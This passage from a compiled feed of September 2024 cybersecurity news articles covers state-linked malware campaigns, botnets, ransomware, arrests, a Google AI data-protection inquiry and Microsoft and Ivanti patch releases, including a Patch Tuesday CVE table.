"The execution process begins by checking if the Cookie header is present in incoming HTTP requests and reads until the; sign," Check Point said. "The main parameter is F=0/1 which indicates whether the backdoor initializes its command configuration (F=1) or runs the commands based on this configuration (F=0)."
The malicious IIS module, which represents an evolution of a malware classified as Group 2 by ESET in August 2021 and another APT34 IIS backdoor codenamed RGDoor, supports command execution and file read/write operations.
"This campaign against Iraqi government infrastructure highlights the sustained and focused efforts of Iranian threat actors operating in the region," the company said.
"The deployment of a custom DNS tunneling protocol and an email-based C2 channel leveraging compromised accounts highlights the deliberate effort by Iranian actors to develop and maintain specialized command-and-control mechanisms."
Ireland's Watchdog Launches Inquiry into Google's AI Data Practices in Europe
13.9.24 AI The Hacker News
The Irish Data Protection Commission (DPC) has announced that it has commenced a "Cross-Border statutory inquiry" into Google's foundational artificial intelligence (AI) model to determine whether the tech giant has adhered to data protection regulations in the region when processing the personal data of European users.
"The statutory inquiry concerns the question of whether Google has complied with any obligations that it may have had to undertake an assessment, pursuant to Article 35[2] of the General Data Protection Regulation (Data Protection Impact Assessment), prior to engaging in the processing of the personal data of E.U./E.E.A. data subjects associated with the development of its foundational AI model, Pathways Language Model 2 (PaLM 2)," the DPC said.
PaLM 2 is Google's state-of-the-art language model with improved multilingual, reasoning, and coding capabilities. It was unveiled by the company in May 2023.
With Google's European headquarters based in Dublin, the DPC acts as the primary regulator responsible for making sure the company abides by the bloc's stringent data privacy rulebook.
The DPC said an inquiry is crucial to ensure that individuals' fundamental rights and freedoms are safeguarded, especially when processing of such data when developing AI systems can lead to a "high risk."
The development comes weeks after social media platform X permanently agreed not to train its AI chatbot, Grok, using the personal data it collected from European users without obtaining prior consent. Back in August, the DPC said X consented to suspend its "processing of the personal data contained in the public posts of X's E.U./E.E.A. users which it processed between 7 May 2024 and 1 August 2024."
Meta, which recently admitted to scraping every Australian adult Facebook user's public data to train its Llama AI models without giving them an opt-out, has paused its plans to use content posted by European users following a request from the DPC over privacy concerns. It has also suspended the use of generative AI (GenAI) in Brazil after the country's data protection authority issued a preliminary ban objecting to its new privacy policy.
Last year, Italy's data privacy regulator also temporarily banned OpenAI's ChatGPT because of concerns that its practices are in violation of data protection laws in the region.
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers
13.9.24 Safety The Hacker News
WordPress.org has announced a new account security measure that will require accounts with capabilities to update plugins and themes to activate two-factor authentication (2FA) mandatorily.
The enforcement is expected to come into effect starting October 1, 2024.
"Accounts with commit access can push updates and changes to plugins and themes used by millions of WordPress sites worldwide," the maintainers of the open-source, self-hosted version of the content management system (CMS) said.
"Securing these accounts is essential to preventing unauthorized access and maintaining the security and trust of the WordPress.org community."
Besides requiring mandatory 2FA, WordPress.org said it's introducing what's called SVN passwords, which refers to a dedicated password for committing changes.
This, it said, is an effort to introduce a new layer of security by separating users' code commit access from their WordPress.org account credentials.
"This password functions like an application or additional user account password," the team said. "It protects your main password from exposure and allows you to easily revoke SVN access without having to change your WordPress.org credentials."
WordPress.org also noted that technical limitations have prevented 2FA from being applied to existing code repositories, as a result of which it has opted for a "combination of account-level two-factor authentication, high-entropy SVN passwords, and other deploy-time security features (such as Release Confirmations)."
The measures are seen as a way to counter scenarios where a malicious actor could seize control of a publisher's account, thereby introducing malicious code into legitimate plugins and themes, resulting in large-scale supply chain attacks.
The disclosure comes as Sucuri warned of ongoing ClearFake campaigns targeting WordPress sites that aim to distribute an information stealer called RedLine by tricking site visitors into manually running PowerShell code in order to fix an issue with rendering the web page.
Threat actors have also been observed leveraging infected PrestaShop e-commerce sites to deploy a credit card skimmer to siphon financial information entered on checkout pages.
"Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes," security researcher Ben Martin said. "Weak admin passwords are a gateway for attackers."
Users are recommended to keep their plugins and themes up-to-date, deploy a web application firewall (WAF), periodically review administrator accounts, and monitor for unauthorized changes to website files.
Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances
13.9.24 BotNet The Hacker News
The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws.
Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia.
"The Quad7 botnet operators appear to be evolving their toolset, introducing a new backdoor and exploring new protocols, with the aim of enhancing stealth and evading the tracking capabilities of their operational relay boxes (ORBs)," researchers Felix Aimé, Pierre-Antoine D., and Charles M. said.
Quad7, also called 7777, was first publicly documented by independent researcher Gi7w0rm in October 2023, highlighting the activity cluster's pattern of ensnaring TP-Link routers and Dahua digital video recorders (DVRs) into a botnet.
The botnet, which gets its name from the fact it opens TCP port 7777 on compromised devices, has been observed brute-forcing Microsoft 3665 and Azure instances.
"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume," VulnCheck's Jacob Baines noted earlier this January. "The botnet doesn't just start a service on port 7777. It also spins up a SOCKS5 server on port 11228."
Subsequent analyses by Sekoia and Team Cymru over the past few months have found that not only the botnet has compromised TP-Link routers in Bulgaria, Russia, the U.S., and Ukraine, but has since also expanded to target ASUS routers that have TCP ports 63256 and 63260 opened.
The latest findings show that the botnet is comprised of three additional clusters -
xlogin (aka 7777 botnet) - A botnet composed of compromised TP-Link routers which have both TCP ports 7777 and 11288 opened
alogin (aka 63256 botnet) - A botnet composed of compromised ASUS routers which have both TCP ports 63256 and 63260 opened
rlogin - A botnet composed of compromised Ruckus Wireless devices which have TCP port 63210 opened
axlogin - A botnet capable of targeting Axentra NAS devices (not detected in the wild as yet)
zylogin - A botnet composed of compromised Zyxel VPN appliances that have TCP port 3256 opened
Sekoia told The Hacker News that the countries with the most number of infections are Bulgaria (1,093), the U.S. (733), and Ukraine (697).
In a further sign of tactical evolution, the threat actors now utilize a new backdoor dubbed UPDTAE that establishes an HTTP-based reverse shell to establish remote control on the infected devices and execute commands sent from a command-and-control (C2) server.
It's currently not clear what the exact purpose of the botnet is or who is behind it, but the company said the activity is likely the work of a Chinese state-sponsored threat actor.
"Regarding the 7777 [botnet], we only saw brute-force attempts against Microsoft 365 accounts," Aimé told the publication. "For the other botnets, we still don't know how they are used."
"However, after exchanges with other researchers and new findings, we are almost certain that the operators are more likely CN state-sponsored rather than simple cybercriminals doing [business email compromise]."
"We are seeing the threat actor attempting to be more stealthy by using new malwares on the compromised edge devices. The main aim behind that move is to prevent tracking of the affiliated botnets."
DragonRank Black Hat SEO Campaign Targeting IIS Servers Across Asia and Europe
13.9.24 APT The Hacker News
A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation.
The black hat SEO cluster has been codenamed DragonRank by Cisco Talos, with victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China.
"DragonRank exploits targets' web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities," security researcher Joey Chen said.
The attacks have led to compromises of 35 Internet Information Services (IIS) servers with the end goal of deploying the BadIIS malware, which was first documented by ESET in August 2021.
It's specifically designed to facilitate proxy ware and SEO fraud by turning the compromised IIS server into a relay point for malicious communications between its customers (i.e., other threat actors) and their victims.
On top of that, it can modify the content served to search engines to manipulate search engine algorithms and boost the ranking of other websites of interest to the attackers.
"One of the most surprising aspects of the investigation is how versatile IIS malware is, and the [detection of] SEO fraud criminal scheme, where malware is misused to manipulate search engine algorithms and help boost the reputation of third-party websites," security researcher Zuzana Hromcova told The Hacker News at the time.
The latest set of attacks highlighted by Talos spans a broad spectrum of industry verticals, including jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and feng shui.
The attack chains commence with taking advantage of known security flaws in web applications like phpMyAdmin and WordPress to drop the open-source ASPXspy web shell, which then acts as a conduit to introduce supplemental tools into the targets' environment.
The primary objective of the campaign is to compromise the IIS servers hosting corporate websites, abusing them to implant the BadIIS malware and effectively repurposing them as a launchpad for scam operations by utilizing keywords related to porn and sex.
Another significant aspect of the malware is its ability to masquerade as the Google search engine crawler in its User-Agent string when it relays the connection to the command-and-control (C2) server, thereby allowing it to bypass some website security measures.
"The threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results," Chen explained. "They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings."
One important way DragonRank distinguishes itself from other black hat SEO cybercrime groups is in the manner it attempts to breach additional servers within the target's network and maintain control over them using PlugX, a backdoor widely shared by Chinese threat actors, and various credential-harvesting programs such as Mimikatz, PrintNotifyPotato, BadPotato, and GodPotato.
Although the PlugX malware used in the attacks relies on DLL side-loading techniques, the loader DLL responsible for launching the encrypted payload uses the Windows Structured Exception Handling (SEH) mechanism in an attempt to ensure that the legitimate file (i.e., the binary susceptible to DLL side-loading) can load the PlugX without tripping any alarms.
Evidence unearthed by Talos points to the threat actor maintaining a presence on Telegram under the handle "tttseo" and the QQ instant message application to facilitate illegal business transactions with paying clients.
"These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients' needs," Chen added.
"Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing."
Singapore Police Arrest Six Hackers Linked to Global Cybercrime Syndicate
11.9.24 Crime The Hacker News
The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.
The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.
The six men, aged between 32 and 42, are suspected of being linked to a "global syndicate" that conducts malicious cyber activities. Pursuant to the operation, electronic devices and cash were seized.
Among those apprehended includes a 42-year-old Chinese national from Bidadari Park Drive, who was found to be in possession of a laptop that contained credentials to access web servers used by known hacker groups. The identities of the threat actors were not disclosed.
In addition, five laptops, six mobile phones, cash totaling more than S$24,000 (USD$18,400), and cryptocurrency worth approximately USD$850,000 were confiscated from the individual.
Three other Chinese nationals, arrested from Mount Sinai Avenue, are said to have been possessing laptops containing personal information related to foreign internet service providers, hacking tools, and "specialized software to control malware" such as PlugX, a remote access trojan widely used by Chinese state-sponsored groups.
The authorities also seized seven laptops, 11 mobile phones, and cash worth more than S$54,600 (USD$41,900) from the three men.
Another 38-year-old Chinese national was arrested from Cairnhill Road over suspicions of "offering to purchase personally identifiable information that was believed to have been obtained through illegal means."
The sixth person, a 34-year-old Singaporean national residing in Hougang Avenue, is believed to have assisted the others in their malicious activities.
The defendants have been charged with offenses under the Computer Misuse Act 1993 for gaining unauthorized access to computer material, retaining personal information without authorization, and retaining software that could be used to commit other malicious attacks.
The Singaporean national has also been charged with abetting the securing of unauthorized access to websites, an offense that's punishable with a fine of up to S$5,000 (USD$3,830), or a jail term of up to two years, or both, for a first-time offender.
Channel News Asia has reported that a sixth Chinese national was also subsequently arrested on Wednesday for instructing the Singapore man to subscribe to a Singtel broadband plan.
"This is a significant operation as the individuals are suspected to be carrying out global malicious cyber operations from Singapore," the SPF said. "We have zero tolerance of the use of Singapore to conduct criminal activities, including illegal cyber activities. We will deal severely with perpetrators."
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware
11.9.24 APT The Hacker News
Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.
"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.
The activity has been assessed to be part of an ongoing campaign dubbed VMConnect that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.
The use of job interviews as an infection vector has been adopted widely by North Korean threat actors, either approaching unsuspecting developers on sites such as LinkedIn or tricking them into downloading rogue packages as part of a purported skills test.
These packages, for their part, have been published directly on public repositories like npm and PyPI, or hosted on GitHub repositories under their control.
ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.
"The malicious code is present in both the __init__.py file and its corresponding compiled Python file (PYC) inside the __pycache__ directory of respective modules," Zanki said.
It's implemented in the form of a Base64-encoded string that obscures a downloader function that establishes contact with a command-and-control (C2) server in order to execute commands received as a response.
In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding "that ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system."
Some of the aforementioned tests claimed to be a technical interview for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors are impersonating legitimate companies in the sector to pull off the operation.
It's currently not clear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn, as recently also highlighted by Google-owned Mandiant.
"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.
The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).
Some of these attacks also entail the propagation of a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. The activity has been linked to a sub-cluster tracked as puNK-003, per S2W.
Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws
11.9.24 Vulnerebility The Hacker News
Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.
The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -
CVE-2024-38014 (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
CVE-2024-38217 (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
CVE-2024-38226 (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
CVE-2024-43491 (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability
"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.
"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."
As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.
CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.
"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.
"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."
The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.
It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.
"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."
Ivanti Releases Urgent Security Updates for Endpoint Manager Vulnerabilities
11.9.24 Vulnerebility The Hacker News
Ivanti has released software updates to address multiple security flaws impacting Endpoint Manager (EPM), including 10 critical vulnerabilities that could result in remote code execution.
A brief description of the issues is as follows -
CVE-2024-29847 (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution.
CVE-2024-32840, CVE-2024-32842, CVE-2024-32843, CVE-2024-32845, CVE-2024-32846, CVE-2024-32848, CVE-2024-34779, CVE-2024-34783, and CVE-2024-34785 (CVSS scores: 9.1) - Multiple unspecified SQL injection vulnerabilities that allow a remote authenticated attacker with admin privileges to achieve remote code execution
The flaws impact EPM versions 2024 and 2022 SU5 and earlier, with fixes made available in versions 2024 SU1 and 2022 SU6, respectively.
Ivanti said it has found no evidence of the flaws being exploited in the wild as a zero-day, but it's essential that users update to the latest version to safeguard against potential threats.
Also addressed as part of the September update are seven high-severity shortcomings in Ivanti Workspace Control (IWC) and Ivanti Cloud Service Appliance (CSA).
The company said it has ramped up its internal scanning, manual exploitation and testing capabilities, and that it made improvements to its responsible disclosure process to swiftly discover and address potential issues.
"This has caused a spike in discovery and disclosure," the company noted.
The development comes in the aftermath of extensive in-the-wild exploitation of several zero-days in Ivanti appliances, including by China-nexus cyber espionage groups to breach networks of interest.
It also comes as Zyxel shipped fixes for a critical operating system (OS) command injection vulnerability (CVE-2024-6342, CVSS score: 9.8) in two of its network-attached storage (NAS) devices.
"A command injection vulnerability in the export-cgi program of Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request," the company said in an alert.
The security hole has been addressed in the below versions -
NAS326 (affects V5.21(AAZF.18)C0 and earlier) - Fixed in V5.21(AAZF.18)Hotfix-01
NAS542 (affects V5.21(ABAG.15)C0 and earlier) - Fixed in V5.21(ABAG.15)Hotfix-01
Microsoft September 2024 Patch Tuesday
| Description | |||||||
|---|---|---|---|---|---|---|---|
| CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
| Azure CycleCloud Remote Code Execution Vulnerability | |||||||
| CVE-2024-43469 | No | No | - | - | Important | 8.8 | 7.7 |
| Azure Network Watcher VM Agent Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38188 | No | No | - | - | Important | 7.1 | 6.2 |
| CVE-2024-43470 | No | No | - | - | Important | 7.3 | 6.4 |
| Azure Stack Hub Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38216 | No | No | - | - | Critical | 8.2 | 7.1 |
| CVE-2024-38220 | No | No | - | - | Critical | 9.0 | 7.8 |
| Azure Web Apps Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38194 | No | No | - | - | Critical | 8.4 | 7.3 |
| DHCP Server Service Denial of Service Vulnerability | |||||||
| CVE-2024-38236 | No | No | - | - | Important | 7.5 | 6.5 |
| Kernel Streaming Service Driver Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38241 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38242 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38238 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38243 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38244 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38245 | No | No | - | - | Important | 7.8 | 6.8 |
| Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38237 | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft AllJoyn API Information Disclosure Vulnerability | |||||||
| CVE-2024-38257 | No | No | - | - | Important | 7.5 | 6.5 |
| Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | |||||||
| CVE-2024-43492 | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | |||||||
| CVE-2024-43476 | No | No | - | - | Important | 7.6 | 6.6 |
| Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38225 | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft Excel Elevation of Privilege Vulnerability | |||||||
| CVE-2024-43465 | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft Management Console Remote Code Execution Vulnerability | |||||||
| CVE-2024-38259 | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft Office Visio Remote Code Execution Vulnerability | |||||||
| CVE-2024-43463 | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft Outlook for iOS Information Disclosure Vulnerability | |||||||
| CVE-2024-43482 | No | No | - | - | Important | 6.5 | 5.7 |
| Microsoft Power Automate Desktop Remote Code Execution Vulnerability | |||||||
| CVE-2024-43479 | No | No | - | - | Important | 8.5 | 7.4 |
| Microsoft Publisher Security Feature Bypass Vulnerability | |||||||
| CVE-2024-38226 | No | Yes | - | - | Important | 7.3 | 6.4 |
| Microsoft SQL Server Elevation of Privilege Vulnerability | |||||||
| CVE-2024-37965 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-37341 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-37980 | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft SQL Server Information Disclosure Vulnerability | |||||||
| CVE-2024-43474 | No | No | - | - | Important | 7.6 | 6.6 |
| Microsoft SQL Server Native Scoring Information Disclosure Vulnerability | |||||||
| CVE-2024-37966 | No | No | - | - | Important | 7.1 | 6.2 |
| CVE-2024-37337 | No | No | - | - | Important | 7.1 | 6.2 |
| CVE-2024-37342 | No | No | - | - | Important | 7.1 | 6.2 |
| Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | |||||||
| CVE-2024-37338 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-37335 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-37340 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-37339 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-26186 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-26191 | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft SharePoint Server Denial of Service Vulnerability | |||||||
| CVE-2024-43466 | No | No | - | - | Important | 6.5 | 5.7 |
| Microsoft SharePoint Server Remote Code Execution Vulnerability | |||||||
| CVE-2024-38018 | No | No | - | - | Critical | 8.8 | 7.7 |
| CVE-2024-43464 | No | No | - | - | Critical | 7.2 | 6.3 |
| CVE-2024-38227 | No | No | - | - | Important | 7.2 | 6.3 |
| CVE-2024-38228 | No | No | - | - | Important | 7.2 | 6.3 |
| Microsoft Windows Admin Center Information Disclosure Vulnerability | |||||||
| CVE-2024-43475 | No | No | - | - | Important | 7.3 | 6.4 |
| Microsoft Windows Update Remote Code Execution Vulnerability | |||||||
| CVE-2024-43491 | No | Yes | - | - | Critical | 9.8 | 8.5 |
| PowerShell Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38046 | No | No | - | - | Important | 7.8 | 6.8 |
| Win32k Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38246 | No | No | - | - | Important | 7.0 | 6.1 |
| Windows Authentication Information Disclosure Vulnerability | |||||||
| CVE-2024-38254 | No | No | - | - | Important | 5.5 | 4.8 |
| Windows Graphics Component Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38249 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38250 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38247 | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Hyper-V Denial of Service Vulnerability | |||||||
| CVE-2024-38235 | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Installer Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38014 | No | Yes | - | - | Important | 7.8 | 6.8 |
| Windows Kerberos Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38239 | No | No | - | - | Important | 7.2 | 6.3 |
| Windows Kernel-Mode Driver Information Disclosure Vulnerability | |||||||
| CVE-2024-38256 | No | No | - | - | Important | 5.5 | 4.8 |
| Windows MSHTML Platform Spoofing Vulnerability | |||||||
| CVE-2024-43461 | No | No | - | - | Important | 8.8 | 7.7 |
| Windows Mark of the Web Security Feature Bypass Vulnerability | |||||||
| CVE-2024-38217 | Yes | Yes | - | - | Important | 5.4 | 5.0 |
| CVE-2024-43487 | No | No | - | - | Moderate | 6.5 | 6.0 |
| Windows Network Address Translation (NAT) Remote Code Execution Vulnerability | |||||||
| CVE-2024-38119 | No | No | - | - | Critical | 7.5 | 6.5 |
| Windows Networking Denial of Service Vulnerability | |||||||
| CVE-2024-38232 | No | No | - | - | Important | 7.5 | 6.5 |
| CVE-2024-38233 | No | No | - | - | Important | 7.5 | 6.5 |
| CVE-2024-38234 | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Networking Information Disclosure Vulnerability | |||||||
| CVE-2024-43458 | No | No | - | - | Important | 7.7 | 6.7 |
| Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38240 | No | No | - | - | Important | 8.1 | 7.1 |
| Windows Remote Desktop Licensing Service Denial of Service Vulnerability | |||||||
| CVE-2024-38231 | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Remote Desktop Licensing Service Information Disclosure Vulnerability | |||||||
| CVE-2024-38258 | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | |||||||
| CVE-2024-43467 | No | No | - | - | Important | 7.5 | 6.5 |
| CVE-2024-38260 | No | No | - | - | Important | 8.8 | 7.7 |
| CVE-2024-38263 | No | No | - | - | Important | 7.5 | 6.5 |
| CVE-2024-43454 | No | No | - | - | Important | 7.1 | 6.2 |
| Windows Remote Desktop Licensing Service Spoofing Vulnerability | |||||||
| CVE-2024-43455 | No | No | - | - | Important | 8.8 | 7.7 |
| Windows Security Zone Mapping Security Feature Bypass Vulnerability | |||||||
| CVE-2024-30073 | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Setup and Deployment Elevation of Privilege Vulnerability | |||||||
| CVE-2024-43457 | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Standards-Based Storage Management Service Denial of Service Vulnerability | |||||||
| CVE-2024-38230 | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Storage Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38248 | No | No | - | - | Important | 7.0 | 6.3 |
| Windows TCP/IP Remote Code Execution Vulnerability | |||||||
| CVE-2024-21416 | No | No | - | - | Important | 8.1 | 7.1 |
| CVE-2024-38045 | No | No | - | - | Important | 8.1 | 7.1 |
| Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | |||||||
| CVE-2024-38252 | No | No | - | - | Important | 7.8 | 6.8 |
| CVE-2024-38253 | No | No | - | - | Important | 7.8 | 6.8 |
| Windows libarchive Remote Code Execution Vulnerability | |||||||
| CVE-2024-43495 | No | No | - | - | Important | 7.3 | 6.4 |
Vulnerabilities: 79
CosmicBeetle Deploys Custom ScRansom Ransomware, Partnering with RansomHub
11.9.24 Ransom The Hacker News
The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses (SMBs) in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub.
"CosmicBeetle replaced its previously deployed ransomware, Scarab, with ScRansom, which is continually improved," ESET researcher Jakub Souček said in a new analysis published today. "While not being top notch, the threat actor is able to compromise interesting targets."
Targets of ScRansom attacks span manufacturing, pharmaceuticals, legal, education, healthcare, technology, hospitality, leisure, financial services, and regional government sectors.
CosmicBeetle is best known for a malicious toolset called Spacecolon that was previously identified as used for delivering the Scarab ransomware across victim organizations globally.
Also known as NONAME, the adversary has a track record of experimenting with the leaked LockBit builder in an attempt to pass off as the infamous ransomware gang in its ransom notes and leak site as far back as November 2023.
It's currently not clear who is behind the attack or where they are from, although an earlier hypothesis implied that they could be of Turkish origin due to the presence of a custom encryption scheme used in another tool named ScHackTool. ESET, however, suspects the attribution to no longer hold water.
"ScHackTool's encryption scheme is used in the legitimate Disk Monitor Gadget," Souček pointed out. "It is likely that this algorithm was adapted [from a Stack Overflow thread] by VOVSOFT [the Turkish software firm behind the tool] and, years later, CosmicBeetle stumbled upon it and used it for ScHackTool."
Attack chains have been observed taking advantage of brute-force attacks and known security flaws (CVE-2017-0144, CVE-2020-1472, CVE-2021-42278, CVE-2021-42287, CVE-2022-42475, and CVE-2023-27532) to infiltrate target environments.
The intrusions further involve the use of various tools like Reaper, Darkside, and RealBlindingEDR to terminate security-related processes to sidestep detection prior to deploying the Delphi-based ScRansom ransomware, which comes with support for partial encryption to speed up the process and an "ERASE" mode to render the files unrecoverable by overwriting them with a constant value.
The connection to RansomHub stems from the fact that the Slovak cybersecurity company spotted the deployment of ScRansom and RansomHub payloads on the same machine within a week's time.
"Probably due to the obstacles that writing custom ransomware from scratch brings, CosmicBeetle attempted to leech off LockBit's reputation, possibly to mask the issues in the underlying ransomware and in turn to increase the chance that victims will pay," Souček said.
Cicada3301 Unleashes Updated Version#
The disclosure comes as threat actors linked to the Cicada3301 ransomware (aka Repellent Scorpius) have been observed using an updated version of the encryptor since July 2024.
"Threat authors added a new command-line argument, --no-note," Palo Alto Networks Unit 42 said in a report shared with The Hacker News. "When this argument is invoked, the encryptor will not write the ransom note to the system."
Another important modification is the absence of hard-coded usernames or passwords in the binary, although it still retains the capability to execute PsExec using these credentials if they exist, a technique highlighted recently by Morphisec.
In an interesting twist, the cybersecurity vendor said it observed signs that the group has data obtained from older compromise incidents that predate the group's operation under the Cicada3301 brand.
This has raised the possibility that the threat actor may have operated under a different ransomware brand, or purchased the data from other ransomware groups. That having said, Unit 42 noted it identified some overlaps with another attack carried out by an affiliate that deployed BlackCat ransomware in March 2022.
BURNTCIGAR Becomes an EDR Wiper#
